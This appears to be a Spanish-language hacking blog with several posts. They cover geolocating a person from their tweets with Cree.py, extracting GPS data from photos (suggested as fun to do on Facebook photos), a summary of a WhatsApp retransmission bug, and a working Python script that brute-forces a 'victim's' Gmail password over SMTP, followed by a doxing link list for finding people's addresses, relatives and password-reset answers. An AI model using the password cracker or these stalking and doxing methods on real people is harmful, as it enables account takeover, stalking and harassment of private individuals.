HACKER ANGELWHITE GALC

lunes, 16 de enero de 2017

Geolocalizando personas mediante sus twetts.

 


Como sabemos, la red social de twitter es la dura competencia de facebook y cada vez causa más y más repercusión y a esto le agregamos de que ninguna persona está exenta de la inseguridad de internet. Por eso mismo en esta entrada les quiero presentar una muy buena herramienta programada en python que encontré hace poco y siendo sincero me intrigó y me parece muy buena a la hora de querer averiguar la geolocalización de una persona, organización u empresa.

Cree.py



Es una simple y sencilla herramienta de geolocalización OSINT que ofrece dicha información a través de las plataformas de redes sociales, obviamente no solo recoge información de twitter, sí no que tenemos plugins para elegir tales como GOOGLE+, flickr, e Instragram. Y se encuentra disponible tanto para windows y linux, sí lo usamos en windows debemos de instalar python para hacerlo funcionar.


Así que veamos, ¿Como podemos descubrir la geolocalización de una persona mediante sus tweets?

Primero nos dirigimos a la página oficial del proyecto y descargamos la versión para linux o para windows, generalmente yo uso linux pero como ahora no tengo a mí disposición mí computadora, voy a bajar la versión para windows y simplemente corremos el instalador.

Luego abrimos cree.py y debemos vincular una cuenta de twitter (Lógicamente) Para empezar con el scaneo, yo recomiendo crear una cuenta nueva de twitter que no hagamos de uso por las dudas.
Y nos dirigimos a la parte de : "Plugins Configuration"


Elegimos : "Twitter Plugin" Y presionamos el botón de : "Run Configuration Wizard"


Luego nos aparece este mensaje diciendonos que debemos presionar : "Next" Para conectarnos con twitter y logearnos con una cuenta que no usemos (Recomendación, no es obligatorio) 


Acá es donde cobra sentido lo que les digo de crear una cuenta nueva y no usar nuestra original, porque cree.py nos pide autorización para poder ser utilizado (Sí bien no conozco qué es lo qué puede recoger de nuestra cuenta, mejor prevenir que lamentar)


Luego de logearnos, nos dará un PIN que debemos introducir en la caja de texto de abajo para poder finalizar el logeo.


Le damos finish y luego presionamos el botón de : "Test Plugin Configuration" Y luego le damos en : "Apply Configuration" Y le damos en : "OK"


Ahora ya que nos logeamos, podemos observar que en el recuadro del output de la herramienta nos aparece el nombre de nuestra cuenta que vinculamos, esto nos indicará que hicimos todos los pasos correctamente.


Ahora sí, procedemos a lo que nos interesa, saber la geolocalización de alguien. En la barra de herramientas de arriba, presionamos el botón de la persona que dice : "Person Based Project" Y nos va a aparecer el siguiente recuadro, le ponemos un nombre al proyecto, y le damos : "Next"


Luego en el otro recuadro que nos aparecerá en : "Search For" Pondremos el nombre de la cuenta de usuario que queremos buscar, en mí caso voy a buscar la cuenta de : "Hacks Hackers Bs As" Y copiamos el nombre de usuario y lo pegamos allí.



Presionamos en : "Search" Y nos va a buscar ese nombre en especifico y los que se parezcan, lo seleccionamos y le damos en : "Add To Targets"  Y después le damos en : "Next".


Luego, next otra vez y al final le damos en FINISH.



Listo, ya tenemos configurado la cuenta y seleccionada la persona u empresa que queremos escanear, lo siguiente que vamos a hacer es ver que se nos va a crear una carpeta con el nombre que le agregamos al proyecto y la vamos a clickear una sola vez (Clickear la carpeta cada vez que vamos a hacer un escaneo diferente es obligatorio, porque sí no le especificamos al programa que es lo que queremos que escanee, nos va a escanear el último proyecto que creamos anteriormente)


Y por último, presionamos el botón de la barra de herramientas de arriba : "Analyze Current Project" Y luego de un rato, nos va a mostrar los últimos twetts que se hicieron y desde que provincia lugar, fecha y hora se hicieron. (Además el mapa de google maps para mostrarnos la ubicación)


Últimos twetts y localización :



Ahora, también nos permite ver más detalladamente la ubicación, sí presionamos en ese objeto de color azul, para expandirlo, podemos ver un poco más de información sobre el usuario que creó el twett, el enlace y la fecha :


Y eso no es todo, también podemos ver en modo satelite :


Y el clásico de insertar la personita amarilla para ver todo en primera persona :


¡Y esto fue todo, espero les haya sido útil, saludos!

OBTENER LOS METADATOS DE UNA IMAGEN




En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.
Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación.
Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.
También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real.

¿Qué son los metadatos?
Metadatos en pocas palabras es decir, los datos acerca de los datos, por ejemplo cuando se toma una fotografía, se obtiene una gran cantidad de datos, como qué tipo de cámara tome la foto, la hora y fecha en que fue tomada etc...
Ahora bien, para realizar este método, usaremos la herramienta EXIFTOOL que esta disponible tanto para Linux como para Windows.
En BackTrack podemos encontrarla en la siguiente dirección:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool.
Si aun no la tenes, podes descargarla desde el siguiente link: Download Exiftool Linux - Windows
Descomprimen el archivo Exiftool en una carpeta preferida, abren la terminal y vamos a la carpeta exiftool.

INSTALACIÓN:

  • perl Makefile.PL
  • make
  • make test
  • make install
  • ./exiftool

Teniendo todo listo, creamos una carpeta donde ira la imagen que deseamos extraer los metadatos, en este caso yo he creado una carpeta en root con el nombre images, asegurese de conocer bien la ruta.
La imagen que voy a utilizar se llama fotografia.jpg la cual esta en la carpeta images.
La ruta seria: ~/images/fotografia.jpg
Ahora, en la terminal de exiftool tecleamos el siguiente comando:
./exiftool -a ~/images/fotografia.jpg
La cual nos arroja los siguientes datos:

Se puede observar muchos datos, como la fecha y hora que se tomo la imagen y todo lo demas que mencione lineas arriba, ademas de que la foto fue tomada desde un SAMSUNG.
En este caso, queremos saber la ubicacion de donde fue tomada la fotografia, por lo que copiaremos los datos GPS, la cual son los siguientes:
  • GPS Latitude: 42 deg 24' 54.91" N
  • GPS Longitude: 83 deg 25' 21.36" W
  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, nos dirigimos a http://www.maps.google.com e introducimos las coordenadas.
  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W


¿Por qué no funciona? Bueno, en primer lugar tenemos que tener algunas cosas claras, por ejemplo:
Las coordenadas son:
  • 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, tenemos que quitar todo el ' " , N W y poner - entre el medio de las coordenadas, por lo que quedaría así:
  • 42 24 54.91 - 83 25 21.36
Ahora, esas coordenadas las introducimos en Google Maps y nos dará la ubicación exacta.

Como podemos apreciar, esta Fotografía fue tomada en  Laurel Park Dr Livonia, MI 48152, EE.UU
Una cosa divertida de hacer esto es tomar fotos desde Facebook y utilizar este método para encontrar las Coordenadas GPS.
Observemos el siguiente video 

El BUG de WhatsApp que permite que te espíen mensajes... y te roben las llamadas de WhatsApp Call

Resultado de imagen para el gran agujero de whatsapp 


Tras ver todos los casos de espionaje publicados tras los documentos filtrados por Edward Snowden, no hace falta decir que la sensibilidad de todo el mundo con el tema de la privacidad es alta. Por eso, los sistemas de mensajería cifrada extremo a extremo (e2e encryption) aparecieron por muchos rincones de Internet. WhatsApp fue uno de los que añadió esta capacidad - a pesar de que en iPhone la base de datos permanece sin cifrar en el dispositivo - a sus sistemas de comunicación, haciendo uso del protocolo que implementa Signal, la herramienta de mensajería con e2e encryption diseñada por Moxie Marlinspike.
 
 

Ahora, la polémica ha venido cuando el investigador de seguridad Tobias Boelter ha publicado un bug en WhatsApp que, por motivos de usabilidad, permite a un atacante acceder a los mensajes que no han llegado aún a su destinatario por la forma en la que la implementación de WhatsApp permite hacer regeneración de claves de cifrado automáticamente para usuarios offline. Esto es fácil de entender, vamos a verlo paso a paso, y nada complicado de implementar para aquellos que quieran espiar WhatsApp.

El bug de reenvío de mensajes en WhatsApp
A día de hoy WhatsApp usa cifrado e2e, por lo que cada conversación entre dos personas va cifrada con las claves públicas del destinatario. Es decir, cada mensaje que se cifre con la clave pública del destinatario solo podrá descifrarse si se posee la clave privada asociada, que es generada por cada usuario en el dispositivo. Esto quiere decir que, cuando una persona instala y configura WhatsApp en su teléfono, automáticamente se genera un par de claves pública y privada nuevas. La pública será enviada a todos los contactos y la privada permanece en el dispositivo. 
Cualquier contacto puede verificar, vía WhatsApp, que las claves de cifrado públicas que se están utilizando en la conversación son las correctas tal y como se explica en este artículo [Verificar claves de cifrado de contactos de WhatsApp] y además, cada usuario podrá activar en las opciones de WhatsApp->Seguridad la posibilidad de recibir un mensaje cada vez que se cambien las claves. Esta opción hay que ponerla siempre, como parte de las recomendaciones que existen para Proteger WhatsApp a prueba de balas, pero como vamos a ver aquí, no es suficiente.

Figura 2: Opciones de Seguridad de WhatsApp para recibir alertas
Ahora bien, ¿qué pasa si tú envías un mensaje a un terminal y este está apagado? Pues aquí viene el fallo en la implementación de WhatsApp. Supongamos el siguiente escenario. Yo soy un objetivo de un ataque porque soy un presidente de una empresa que está sufriendo un APT o un objetivo político de un gobierno que va a tomar un avión que le va a llevar de Madrid a Washington D.C. para una reunión. Mi teléfono va a estar en modo avión durante 7 u 8 horas, por lo que ningún mensaje que me envíen por WhatsApp me va a llegar.
Todos los mensajes que me envíen durante el tiempo que estoy en modo vuelo aparecerán en el terminal de los emisores con un solo tic, y en los servidores de WhatsApp cifrados con la clave pública de mi teléfono. Algo que por seguridad, podría haber verificado con todos mis contactos.

Figura 3: Verificación del código de cifrado con mis contactos
Ahora pongamos por un momento que los atacantes han conseguido una copia de la tarjeta SIM o han hecho un SIM Swapping, o si es el gobierno del país, ha solicitado un duplicado de la misma con una orden judicial. En ese momento la NSA - suponiendo que fuera ese gobierno USA y los tiempos de los que hablaban los documentos de Edward Snowden - podría registrar mientas el objetivo está volando, la cuenta de WhatsApp en un nuevo dispositivo. Ahí viene el fallo.
Pues bien, la característica implementada por Facebook hace que, automáticamente los servidores de WhatsApp recibirán una notificación de cambio de clave pública del destinatario de los mensajes y, para que la experiencia de usabilidad sea mejor, pide a todas las apps de WhatsApp de los emisores de los mensajes que cifren y envíen - automáticamente y sin capacidad de pararlo - otra vez todos los mensajes que aún no han sido entregados, pero cifrados con la nueva clave pública del destinatario.
Si el usuario ha activado la opción de recibir alertas de seguridad, entonces DESPUÉS de haber enviado los mensajes, el emisor recibirá una alerta que explica que se han cambiado las claves - probablemente por un cambio de dispositivo - y que puede verificarlas otra vez.

Figura 4: El emisor recibe la alerta después, pero el mensaje se envía antes
Esto es un bug que permite a un atacante interceptar mensajes de sus víctimas en ciertas circunstancias, pero la queja de los expertos en criptografía no es solo referida a este fallo - que WhatsApp puede cambiar simplemente pidiendo confirmación de que quiere enviar los mensajes al destinatario con la nueva clave ANTES de enviarlos, sino que al ser una app de código cerrado, es difícil verificar todo el proceso. 
No es el caso, pero una app de cifrado e2e en mensajería podría decir en su interfaz que está usando unas claves, y luego estar usando otras o, directamente, enviar el mismo mensaje varias veces y cada vez cifrado con una clave distinta. Por eso, muchas organizaciones activistas recomiendan no usar bajo ningún concepto software criptográfico que no sea OpenSource para que pueda ser revisado completamente el proceso.

Figura 5: Recomendación de The Guardian para dejar de usar WhatsApp
Como se puede ver online, el periódico The Guardian recomienda directamente NO utilizar WhatsApp si te preocupa de verdad el cifrado e2e en los mensajes y dejar de usarlo, ya que esta forma de funcionar no garantiza que el mensaje que has enviado con una clave de cifrado vaya a ser el que se utilice al final para ello. No hay que olvidar que The Guardian fue el primer medio que publicó los documentos filtrados por Edward Snowden, y que Facebook aparecía como parte de los participantes del programa PRISM para espiar de forma automática perfiles en Internet.
Figura 6: Diapositiva del programa PRISM filtrada por The Guardian
En el vídeo de la demostración puede verse cómo funciona el proceso completo, y además es muy fácil de probar. Puedes además acceder a las diapositivas de Tobias Boelter que explica paso a paso el bug y al blogpost [WhatsApp Retransmission Vulnerability] que lo detalla.







jueves, 12 de enero de 2017

Hackeando cualquier correo electrónico como en MR.ROBOT – HackWise EP4

 


En el episodio S01EP01 de la serie de Mr.robot observamos como hackea a su psiquiatra Krista accediendo a su correo electrónico para conocer un poco más acerca de su vida. En esta ocasión analizamos y realizamos los códigos necesarios para poder crear la herramienta mepscrk.py (Mr.Ebola Password cracker) inspirada en el episodio de Mr.robot
En la serie se ve que utilizan la herramienta ELPSCRK. (ELliot’s PaSsword CRacKer) de la siguiente manera:

elpscrk -list pswList.list-add Dylan; June 3rd, Stonehenge

 


Como podemos observar elpscrk, permite ingresar una lista de argumentos para que el sistema calcule contraseñas en base a esa información.
Lo primero que necesitaremos es crear g3n3r4t0r.php el cual nos permitirá generar posibles contraseñas con la información que demos de alta en el arreglo $arr, en este ejemplo ingresamos ’09’, ’08’, ‘1986’.

g3n3r4t0r.php



Una vez que generamos todas las posibles contraseñas, pasamos a crear mepscrk.py el Mr.Ebola Password cracker que nos permitirá intentar conectar con el servicio smtp.gmail.com por el puerto 587. El sistema intentara contraseña por contraseña almacenada en pswd.list hasta dar con la correcta.

  mepscrk.py

#                       ___.          .__         
#   ____________    ____\_ |__   ____ |  | _____  
#  /     \_  __ \ _/ __ \| __ \ /  _ \|  | \__  \ 
# |  Y Y  \  | \/ \  ___/| \_\ (  <_> )  |__/ __ \_
# |__|_|  /__|    /\___  >___  /\____/|____(____  /
#       \/        \/   \/    \/                 \/
#                                                     .___
# ___________    ______ ________  _  _____________  __| _/
# \____ \__  \  /  ___//  ___/\ \/ \/ /  _ \_  __ \/ __ |
# |  |_> > __ \_\___ \ \___ \  \     (  <_> )  | \/ /_/ |
# |   __(____  /____  >____  >  \/\_/ \____/|__|  \____ |
# |__|       \/     \/     \/                          \/
#                             __                
#   ________________    ____ |  | __ ___________
# _/ ___\_  __ \__  \ _/ ___\|  |/ // __ \_  __ \
# \  \___|  | \// __ \\  \___|    <\  ___/|  | \/
#  \___  >__|  (____  /\___  >__|_ \\___  >__|  
#      \/           \/     \/     \/    \/      


import smtplib

class bcolors:
    OK = '\033[92m'
    FAIL = '\033[91m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    UNDERLINE = '\033[4m'

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

print bcolors.BOLD + "Welcome to, mr.ebola Email Cracker based on MR.ROBOT - S01E01 11m03s" + bcolors.ENDC
print bcolors.BOLD + "TRYING WITH PASSWORDS IN: psw.list" + bcolors.ENDC

user = raw_input("Enter the victim's email address: ")
passwfile = "psw.list"
passwfile = open(passwfile, "r")

for password in passwfile:
    try:
        smtpserver.login(user, password)
        print bcolors.UNDERLINE + "Password Found: %s"  % password + bcolors.ENDC
        break;
    except smtplib.SMTPAuthenticationError:
        print bcolors.FAIL + "Password Incorrect: %s" % password + bcolors.ENDC


El contenido del archivo psw.list deberá contener algo como esto, respetando el salto de linea para que mepscrk.py funcione correctamente.

 psw.list


1 09081986
2 09198608
3 08091986
4 08198609
5 19860809
6 19860908

 REVISE MOS EL SIGUIENTE VIDEO..........







Gracias a nuestro amigo HackWis quien fue el creador del video y de la herramienta usada en esta serie



sábado, 7 de enero de 2017

Enlaces para Doxing, Personal OSINT, perfiles, Huella, Cibernético

 
Tal vez usted está haciendo una prueba de intrusión y necesita información antes de llevar a cabo un ataque de ingeniería social. Tal vez lo que desea es ver si alguien que lo contactó en línea es de fiar, o conocer qué datos suyos es por ahí para que otros puedan encontrar.
 
Aquí hay una colección de sitios I y otros han encontrado útil para encontrar datos sobre una persona u organización. Yo les estoy publicando sobre todo por lo que no los pierda, y por lo que tengo un lugar para apuntar a otros a cuando preguntan. Si usted tiene ideas para adiciones por favor, póngase en contacto conmigo .
 
Hay herramientas para automatizar algunas de estas tareas, pero hay algo que decir para hacerlo "a mano". Las computadoras son muy buenos para las matemáticas y la automatización, pero la extracción de contexto es un poco más difícil para mis amigos de silicio (y también para mis amigos de silicona). La mente humana puede ser mucho mejor en estas tareas, al menos en algunas mentes. La forma en que tiene que pensar es en la fabricación de conexiones. Una miga de pan de datos lleva a la otra, lo que lleva a la otra y luego otra. Por ejemplo:
  • Encontrar un nombre de usuario lleva a otros perfiles con más datos, esto conduce a un nombre completo, entonces esto podría conducir a una dirección física.
  • Un nombre de usuario puede llevar a las fotografías, lo que podría dar lugar a placas o direcciones físicas.
  • Para los nombres comunes como John Doe añadiendo los intereses de un perfil o un lugar puede conducir a la reducción a los resultados a una persona específica.
Todo es cuestión de hacer las conexiones. Tenga en cuenta, que normalmente se encontrará más información sobre alguien que es Savy tecnología entonces alguien que no lo es. Mi abuela no está en Facebook después de todo.

Por favor, tenga en cuenta que hay un un buen número de problemas comunes de este tipo de sitios de agregación de redes sociales:

1. Algunos sitios comienzan libre, y luego ir pagada. Cuando esto sucede, se obtiene una gran cantidad de información se burla que conducen a las compañías que quieren su tarjeta de crédito. Apestoso!
2. Las personas les gusta crear mashups, pero luego abandonarlos después se acabó la diversión. A continuación, los cambios en la API de back-end, y el sitio ya no funciona. ¿Qué sitios son buenos para una tarea cambia con el tiempo.
3. Algunos pueden pedir las credenciales de red social. Es posible que desee hacer algunas cuentas de usar y tirar sólo para los fines de la utilización de estas herramientas.  
Esta página necesitará t ser actualizado con el tiempo, así que por favor enviar sugerencias.
 
Búsqueda general:

Google
Duh. Asegúrese de que conoce a sus operadores para conseguir que la mayor parte de él sin embargo. http://www.google.com Bing Ok, Bing se burlado de muchos como un "también corrió" junto a Google, pero tiene algunas características impresionantes. Muchos de los mismos operadores de Google trabajan aquí, pero realmente me cavar que sólo tiene Bing es IP: para encontrar otros sitios web en la misma IP (cruz servidor compartido referencia a la diversión). http://www.bing.com/ 

redes, de dominio y de información de enrutamiento

La mayor parte de esta página cubrirá encontrar información sobre las personas de las redes sociales, y no de la red de redes. Sin embargo, a veces sabiendo que es dueño de una red / dominio / IP es un gran lugar por lo que empezar, y la gente deja las cosas en sus registros Whois que pueden revelar una gran cantidad de pistas útiles. Hay tantos sitios que ofrecen este tipo de servicios, pero sólo cubrirán mis favoritos.
RobTex
Mientras que la interfaz es un poco raro en mi opinión, este es un gran sitio para hacer DNS inverso las operaciones de búsqueda de direcciones IP, agarrando contactos Whois, y encontrar otra información general acerca de un nombre IP o dominio. http://www.robtex.com ServerSniff Éste es una especie de bola impar. Un montón de sitios ofrecen información Whois, éste va a herramientas más exóticas. Usted realmente tiene que jugar sólo con él para encontrar todas sus características. A veces es difícil recordar qué opción es dónde. Sólo algunas de las herramientas son: ICMP y TCP trazas de ruta, información SSL, informes de DNS y nombres de host en una dirección IP compartida. Es bueno que te hicieran algo de la reconstrucción para usted si usted no desea utilizar un proxy y no desea que su dirección IP aparezca en los registros del objetivo. http://serversniff.net 

Buscando perfiles en una persona OSINT Bookmarklets v0.2 

 http://illmob.org/bookmark.html página fresca de Will Genovese donde se puede búsqueda del teléfono, IP, Host, correo electrónico, S / N , Nombre, Dirección y datos de forma automatizada.

Las raíces de los alces
http://www.mooseroots.com
sitio impresionante, especialmente para estos sub-sitios
http://birth-records.mooseroots.com/
http://marriage-divorce-records.mooseroots.com/
que son excelentes para Delinear las relaciones familiares para las preguntas de restablecimiento de contraseña.

Revisión de Antecedentes avanzadas
 
para la búsqueda de direcciones de calles y familiares esta es la bomba. Hasta ahora, no me ha fallado en la búsqueda de direcciones de calles si tengo una vaga idea en la que alguien vive
http://www.advancedbackgroundchecks.com
 
Usted peek 
 
La interfaz es limpia, y mientras que enlaza fuera a pagar los sitios que al menos le da información real en primer lugar. Me parece recordar que sea mejor en el pasado. http://www.peekyou.com
  Lullar Búsqueda de una persona mediante correo electrónico | Nombre | nombre de usuario. No hay tantos resultados devueltos como en otros sitios, pero lo que le da una agradable es limpio, con un vistazo a todos los sitios de pago en el camino. http://com.lullar.com/ Comprobar nombres de usuario Ok, tengo que decir que me encanta este sitio. Puede que no han sido pensada como un sitio para el perfilado, pero funciona bien para esa tarea. Todos hablamos de reutilización de contraseñas de ser un problema, pero para el perfil de alguien nombre de usuario de la reutilización es donde se encuentra en. Este sitio le permite buscar 160 sitios de redes sociales para ver si se toma un nombre de pantalla. A partir de ahí, se puede ir a ver lo que está en un perfil de personas en esos sitios a mano. Guarda algunos versos que controla tiempo para una cuenta en cada sitio usted mismo, pero todavía hay un montón de trabajo para que usted pueda hacer después.   http://www.checkusernames.com/ KnowEm similares para ver los nombres de usuario anterior, sino que alega para comprobar más de 500 sitios para ver si se toma un nombre de usuario dado. http://knowem.com Búsqueda incremental Este solía ser Spock ( "único punto de contacto (por) la palabra clave"). No estoy seguro cuando cambió, mi conjetura es después de Intelius los compró. Puede buscar en Nombre | Teléfono | Emai | lScreen Nombre. Bueno para la búsqueda de familiares, supongo. Una vez que encuentre un nombre de un nombre de usuario que debe dar un paso atrás y la búsqueda de ella, así como los resultados varían mucho. Parece que conducir sobre todo a la gente a pagar dinero para Intelius. http://www.isearch.com Pipl Puede buscar Nombre | Correo electrónico | Nombre de usuario | Teléfono y encontrar resultados relacionados. Los resultados pueden ser muy ruidoso, con enlaces a un montón de sitios de pago (Spokeo, Intellus, etc.), pero si usted está dispuesto a ordenar a pesar de la porquería que es bastante agradable. Me gusta lo que muestra de los registros públicos, los perfiles de Amazon, y las redes sociales. http://www.pipl.com 123 personas al igual que todos los anteriores. Enlaces fuera a un montón de otros recursos, algunos pagan y otros no. http://www.123people.com Spokeo Ok, Spokeo tiene algunas características de diseño agradable, pero es una tomadura de pelo información. En ella se informa "hey encontrado algo" mucho, pero usted tiene que pagar por los resultados. Al igual que la delincuencia, no pago. Aún así, puede ser agradable como punto de partida para dirigir que en otros lugares. Por ejemplo, una vez que conocer a alguien tiene un perfil en Facebook, sólo puede ir a Facebook. http://www.spokeo.com WebMii Permite que se ve a la gente por su nombre o una palabra clave (prueba nombre de usuario como una palabra clave). http://webmii.com/ información ampliar parece bastante bueno para encontrar a alguien en donde trabaja. Me pregunto qué parte de la información es sólo de LinkedIn, y la cantidad de otras fuentes? Mirando al lado del otro, información ampliar parece aumentar con los datos de otras fuentes. http://www.zoominfo.com.

 Geo Localización Android mapa Si tiene la dirección MAC del router (que sucede) Samy tiene una herramienta para tratar de geolocalizar que la base de lo que Google sabe. Parece probable que Google está utilizando teléfono Android para hacer un wardrive distribuida para complementar sus datos de vista de tranvías. http://samy.pl/androidmap Bing Mapa Aplicaciones Las aplicaciones de los mapas son un buen extra para tener, pero se necesita Silverlight y que no parecen estables a menos que usted está utilizando Internet Explorer (que figura). Mira el mapa aplicación de Twitter. http://www.bing.com/maps/ Twitter Mapa También agradable para ver donde la gente está twitteando de, pero no tan elegante o tan amplia como la aplicación de Bing. http://twittermap.appspot.com/~~number=plural 

 otras rarezas

411
He tenido buena suerte con el uso de este para encontrar direcciones y vecinos.
http://www.411.com/
Google
Me imagino mayoría de la gente sabe acerca de Google, pero ¿sabía usted que puede subir imágenes (o arrastrar y soltar) para encontrar resultados similares? Bueno para la búsqueda de perfiles con diferentes nombres. Estaño de ojos es similar, pero no parece cubrir la mayor cantidad.
http://images.google.com/
Estaño de ojos
que se ha encontrado una foto de alguien, y se preguntó si es que existía en otros lugares? Estaño de ojos, y es complemento del navegador, permiten elegir una imagen y encontrar otros similares en línea, incluso los que se han comprado en serio. Desafortunadamente, la base de datos parece pequeño. Mi esperanza sería ir a un perfil de red social, haga clic derecho en una imagen sólo conozco el nombre de usuario, y luego encontrar otros perfiles con un nombre real y mejor información. Hasta el momento, es en su mayoría ha sido útil para conocer "quién es este actor / modelo", pero quizás en el futuro será mejor. http://tineye.com libro abierto no debe amar a las personas que dejan comentarios de Facebook abierta al mundo. Incluso si una persona es consciente de la privacidad, un amigo de ellos no puede ser, y podía hacer comentarios sobre ellos. http://youropenbook.org/

Abrir Búsqueda de Estado de
 
libro abierto parece haber desaparecido, y el Open de Búsqueda de Estado parece ser la mejor alternativa.
http://openstatussearch.com/

Pico Niebla
 
puede encontrar algo bueno, puede encontrar algo que te marca de por vida. http://picfog.com páginas blancas Búsqueda de Vecinos podría ser útil si necesita SE alguien cerca. http://www.whitepages.com/find_neighbors

Yasni
 
he tenido bastante buena suerte usando esta información para raspar en las personas. http://www.yasni.com Archive.org Wayback Machine veces alguien deja caer sus documentos, pero los elimina. La Wayback Machine puede ayudar a encontrar la información borrada. http://www.archive.org/web/web.php de lectora Tal vez los mensajes de persona en algunos foros con un nombre de usuario dado? Podría dar lugar a información útil. http://boardreader.com Omgili Otra búsqueda bordo, como el de arriba. http://omgili.com 

Herramientas



Ok, no se trata de sitios web, pero maldita herramientas útiles que tiran de recursos web.

Maltego
ingeniosa herramienta, y me gusta la forma en que se dibuja conexiones entre entidades como nombre, dominio, direcciones de correo electrónico, etc., bueno para la construcción de un mapa mental de cómo las cosas están relacionadas. Yo prefiero hacer cosas a mano para aclarar los falsos positivos e interpretar los datos. Es probable que tenga que registrarse para las claves API para obtener el máximo provecho de ella. http://www.paterva.com NetGlub Esto podría algún día ser un sustituto de código abierto para Maltego, pero ahora parece casi imposible de conseguir trabajo. http://www.netglub.org/ Foca realmente me gusta esta herramienta. Se puede hacer búsquedas de formatos de documentos comunes a través de Google y otros motores de búsqueda, y luego descargarlas para extraer metadatos. Encantador. http://www.informatica64.com/DownloadFOCA/ Cree.py Gran herramienta para geolocalizar / seguimiento de Twitter / usuarios de Foursquare. No sólo lo hace con las coordenadas de los mensajes directamente, pero puede apoderarse de ellos a partir de los datos EXIF de las imágenes que enlazan con. http://ilektrojohn.github.com/creepy/~~number=plural 

 sitios que he encontrado tan inútil 

 que ni siquiera voy a unir a ellos, pero quiero que la gente no preguntar "¿por qué no está X Precio ? "en su mayoría se obtiene en esta lista por tener poca o ninguna información gratuita, y sólo conduce a cuestionables para obtener información de pago. ZabaSearch yoname (uso a gustar, ahora los resultados parecen bastante malas) guiño mylife Freeality InfoSpace Gracias a @ davemarcus , @ ukfully , @ Digininja , @ CiphersSon , @ b4seb4nd , @ xillwillx   y pentest-standard.org .